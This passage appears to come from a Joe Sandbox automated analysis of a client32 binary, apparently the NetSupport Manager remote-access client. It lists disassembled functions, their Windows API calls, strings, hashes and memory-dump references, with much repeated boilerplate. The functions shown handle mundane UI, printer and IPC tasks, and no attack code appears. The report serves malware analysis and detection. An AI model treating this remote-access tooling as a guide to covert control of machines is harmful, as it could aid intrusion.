                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageWindow$FindPost$ClassNameSendSleepThread
                                                                                                                                                                • String ID: ..\CTL32\ipc.cpp$m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData)
                                                                                                                                                                • API String ID: 3524374798-1411620790
                                                                                                                                                                • Opcode ID: 67c5e620853e1d11e626b2d2fc78237df1a555fe25ff6300bbbfefdcee193b2a
                                                                                                                                                                • Instruction ID: 467c52180ee9b65f1f143bc83655d8e0b60a3a0454055de02c0751fb0dd48fa7
                                                                                                                                                                • Opcode Fuzzy Hash: 67c5e620853e1d11e626b2d2fc78237df1a555fe25ff6300bbbfefdcee193b2a
                                                                                                                                                                • Instruction Fuzzy Hash: 0521737974064AAFD314CF58E8D4D6AF3E9FB88324B10862AE55987A40D730FC50DB60
                                                                                                                                                                Function 11033470 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strncpy$wsprintf
                                                                                                                                                                • String ID: %s (%s)
                                                                                                                                                                • API String ID: 2895084632-1363028141
                                                                                                                                                                • Opcode ID: f9f6e3310434217ef4c8c46f8203760207b9c186a0c62b9b29997845a76e1ea2
                                                                                                                                                                • Instruction ID: f87c7f942544fa5609db8c81607a4340159a62b7cf85849620d444029de2b445
                                                                                                                                                                • Opcode Fuzzy Hash: f9f6e3310434217ef4c8c46f8203760207b9c186a0c62b9b29997845a76e1ea2
                                                                                                                                                                • Instruction Fuzzy Hash: 60317376A04702AFC314DF65C8C0ED3B7A9BF89318B00591DE54A87E41E772F465CB94
                                                                                                                                                                Function 11143110 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 1114314B
                                                                                                                                                                • _strrchr.LIBCMT ref: 1114315A
                                                                                                                                                                • _strrchr.LIBCMT ref: 1114316A
                                                                                                                                                                • wsprintfA.USER32 ref: 11143185
                                                                                                                                                                  • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                                                                                                • String ID: CLIENT32
                                                                                                                                                                • API String ID: 2529650285-3575452709
                                                                                                                                                                • Opcode ID: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                                                                                                • Instruction ID: d978b5afe12e8555e920acd6faf46f6bc40337599c773746d871781ff4fb06a8
                                                                                                                                                                • Opcode Fuzzy Hash: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                                                                                                • Instruction Fuzzy Hash: DD21DD31A182698FE712EF348D407DAFBB4DF15B0CF2000D8D8850B182D7716885C7A0
                                                                                                                                                                Function 1104D4D0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72timeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • KillTimer.USER32(00000000,00000001), ref: 1104D51F
                                                                                                                                                                  • Part of subcall function 11037F50: wsprintfA.USER32 ref: 11037FBE
                                                                                                                                                                  • Part of subcall function 11037F50: SetDlgItemTextA.USER32(?,?,?), ref: 1103808F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ItemKillTextTimerwsprintf
                                                                                                                                                                • String ID: AckDlgTimeoutAccept$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 1646146092-175777528
                                                                                                                                                                • Opcode ID: f215e8b6413442d04b3451991cc880a85c16dd1b79b50f35b06b58bef8d6d570
                                                                                                                                                                • Instruction ID: d5468b0f3d8a416eff1aa5c481de97aef7fe48a1706f439c4557e335cb460193
                                                                                                                                                                • Opcode Fuzzy Hash: f215e8b6413442d04b3451991cc880a85c16dd1b79b50f35b06b58bef8d6d570
                                                                                                                                                                • Instruction Fuzzy Hash: 33112679B0070AABE710CAA5DC80FAFB3D9AB94718F204439FA1587680DA70F841C7A5
                                                                                                                                                                Function 11065340 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetProfileStringA.KERNEL32(Windows,Device,No default printer,,LPT1:,?,00000050), ref: 11065366
                                                                                                                                                                • _memmove.LIBCMT ref: 110653B1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProfileString_memmove
                                                                                                                                                                • String ID: Device$No default printer,,LPT1:$Windows
                                                                                                                                                                • API String ID: 1665476579-2460060945
                                                                                                                                                                • Opcode ID: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
                                                                                                                                                                • Instruction ID: a358cf5610f4a81608be9fe47ec1da84b056d0ceaed1d9bd2f397f709d6f9fc8
                                                                                                                                                                • Opcode Fuzzy Hash: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
                                                                                                                                                                • Instruction Fuzzy Hash: 0E119E35D002669AD700CFB0DC45BFEBBACDF01788F144158DC869B240EAF22609C3E1
                                                                                                                                                                Function 111317A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 58COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 111317AE
                                                                                                                                                                Strings
                                                                                                                                                                • DisableRunplugin, xrefs: 111317E8
                                                                                                                                                                • Check9xLogon - [bLoggedIn: %u] send command %d to connections, xrefs: 11131822
                                                                                                                                                                • Client, xrefs: 111317ED
                                                                                                                                                                • Shell_TrayWnd, xrefs: 111317A9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FindWindow
                                                                                                                                                                • String ID: Check9xLogon - [bLoggedIn: %u] send command %d to connections$Client$DisableRunplugin$Shell_TrayWnd
                                                                                                                                                                • API String ID: 134000473-1587978603
                                                                                                                                                                • Opcode ID: 005ebd3838b9853926394f1176bd741e02b5462fb98bbae0602bbe92db2bf6b2
                                                                                                                                                                • Instruction ID: 7cc168f205ac9f83591635f10e1202901ad1310e74e2146c021d4d98835a13fc
                                                                                                                                                                • Opcode Fuzzy Hash: 005ebd3838b9853926394f1176bd741e02b5462fb98bbae0602bbe92db2bf6b2
                                                                                                                                                                • Instruction Fuzzy Hash: 9311067971131AAAEB059BD6CD85BBDF6789B4032EF410069E92096188EB70D444C751
                                                                                                                                                                Function 11107990 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56sleepfileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(000007D0,?,00000001,00000000,?,TerminateVistaUI), ref: 111079DC
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,11107C7C,?,?,?,TerminateVistaUI), ref: 111079ED
                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,11107C7C,?,?,?,TerminateVistaUI), ref: 11107A05
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,11107C7C,?,?,?,TerminateVistaUI), ref: 11107A12
                                                                                                                                                                  • Part of subcall function 110F5E90: WaitForSingleObject.KERNEL32(?,00000000,?,?,111079B5,?,TerminateVistaUI), ref: 110F5EA1
                                                                                                                                                                  • Part of subcall function 110F5E90: InterlockedExchange.KERNEL32(?,00000000), ref: 110F5EAD
                                                                                                                                                                  • Part of subcall function 110F5E90: CloseHandle.KERNEL32(00000000), ref: 110F5EB8
                                                                                                                                                                  • Part of subcall function 110F5E90: InterlockedIncrement.KERNEL32(111F05FC), ref: 110F5EE5
                                                                                                                                                                Strings
                                                                                                                                                                • Warning. SendToVistaPipe no pipe, from=%s, xrefs: 111079A1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CritiusernterlockedSection$CloseEnterExchangeFileHandleIncrementLeaveObjectSingleSleepWaitWrite
                                                                                                                                                                • String ID: Warning. SendToVistaPipe no pipe, from=%s
                                                                                                                                                                • API String ID: 2034980497-1588131313
                                                                                                                                                                • Opcode ID: 8791a8239dc897272c06ef7d45a1c05d26153b13ed1e30f7087315d541416186
                                                                                                                                                                • Instruction ID: b576ba414e1e298cd3819816e1cc722d527cd760e4656e9653b3731492105499
                                                                                                                                                                • Opcode Fuzzy Hash: 8791a8239dc897272c06ef7d45a1c05d26153b13ed1e30f7087315d541416186
                                                                                                                                                                • Instruction Fuzzy Hash: 1301C071600759AFEB049FA4DC85EAAF3ADFB8872DF40452AF95687540D770AC40CB61
                                                                                                                                                                Function 110374A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf$ItemText
                                                                                                                                                                • String ID: %d%%$0%%
                                                                                                                                                                • API String ID: 3736328045-1572943365
                                                                                                                                                                • Opcode ID: 1cbf6e26115518571587392b494dd67441ffe33dfc485d6b94f43bae65133930
                                                                                                                                                                • Instruction ID: 2b1e674ca0a54edc907812ade49eb5592baca34932e185c63fa3aaecf06507b2
                                                                                                                                                                • Opcode Fuzzy Hash: 1cbf6e26115518571587392b494dd67441ffe33dfc485d6b94f43bae65133930
                                                                                                                                                                • Instruction Fuzzy Hash: 5F01D471A1061CAFC718DF75CD85EAAB7B9EB88209F408129E85597240EE31FD04C761
                                                                                                                                                                Function 111455C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
                                                                                                                                                                  • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                                                                                                  • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                                                                                                  • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                                                                                                  • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                                                                                                  • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 111455D9
                                                                                                                                                                • LoadBitmapA.USER32(00000000,00000000), ref: 111455EF
                                                                                                                                                                • SendDlgItemMessageA.USER32(00000000,00003A97,00000172,00000000,00000000), ref: 1114562B
                                                                                                                                                                Strings
                                                                                                                                                                • ..\ctl32\util.cpp, xrefs: 11145609
                                                                                                                                                                • hGrip || !"Unable to load sizing grip bitmap", xrefs: 1114560E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad$AddressBitmapColorDefaultFreeItemLangMessageProcSendSystemVersion_memset
                                                                                                                                                                • String ID: ..\ctl32\util.cpp$hGrip || !"Unable to load sizing grip bitmap"
                                                                                                                                                                • API String ID: 1044520585-3315463184
                                                                                                                                                                • Opcode ID: 6dab67b1f8d1b8d84d11e25cc4a1c1bf0e98613e631c68fda75dbc45b93d1bcc
                                                                                                                                                                • Instruction ID: 4fd7b2c5b7bb95ac5b9160b37f44e12b5346297b3eaef3b7f99d0903c6763c9c
                                                                                                                                                                • Opcode Fuzzy Hash: 6dab67b1f8d1b8d84d11e25cc4a1c1bf0e98613e631c68fda75dbc45b93d1bcc
                                                                                                                                                                • Instruction Fuzzy Hash: 15F0BB36F4422533D61056B15C06FEBBB5C8B44B6DF044031FE28EAA81DD74990093E5
                                                                                                                                                                Function 11145570 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
